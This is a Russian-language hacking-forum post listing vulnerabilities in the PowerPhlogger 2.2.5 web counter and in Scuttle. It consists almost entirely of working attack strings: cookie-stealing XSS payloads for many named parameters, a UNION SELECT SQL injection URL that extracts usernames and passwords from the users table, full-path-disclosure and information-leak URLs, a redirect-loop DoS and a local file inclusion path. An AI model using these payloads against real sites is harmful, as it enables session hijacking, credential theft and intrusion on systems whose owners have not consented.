• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: PowerPhlogger

baltazar

RAID-массив
Пользователь
Регистрация
26.01.2008
Сообщения
73
Реакции
0
PowerPhlogger
Уязвимости выкладываю в порядке мною нахождения их:)Все проверялись на версии 2.2.5
XSS:
Post-запрос на странице http://site/dspLogs.php
Код:
"><script>alert(document.cookie)</script>
В полях: Host, Referrer, Agent Information, res, colo, online, mp

XSS:
Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Также нашел интересные мета-теги:
Код:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Странная ксс:
На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы)
Код:
http:/site/<script>alert(document.cookie)</script>

Вобщем так

Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

Код:
http://site/include/edCss.inc.php

http://site/include/foot.inc.php

http://site/include/get_csscolors.inc.php

http://site/include/head.inc.php

http://site/include/head_stuff.inc.php

http://site/include/loglist.inc.php

http://site/include/pphlogger_send.inc.php

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/edit_user.php

http://site/main-dummy.php

http://site/main.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Еще XSS(найденые мною давно):


Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы)

Код:
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url

Код:
"><script>alert(document.cookie)</script>
В параметрe N_email

Код:
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c (ограничение в 30 символов)

XSS:

Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit

SQL Injection:
Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

DoS:

http://site/newaccount_self.php

Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20

Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20

Код:
http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20
Данные ксс возможны в связи с использованием в скриптах $PHP_SELF.


Scuttle​
XSS:
Код:
http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3E
Код:
http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вводим в поиске следующий пост запрос
Код:
</textarea><script>alert(document.cookie)</script>

Local File Inclusion:
Код:
http://site.com/help/syntax.html?la=/../query
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх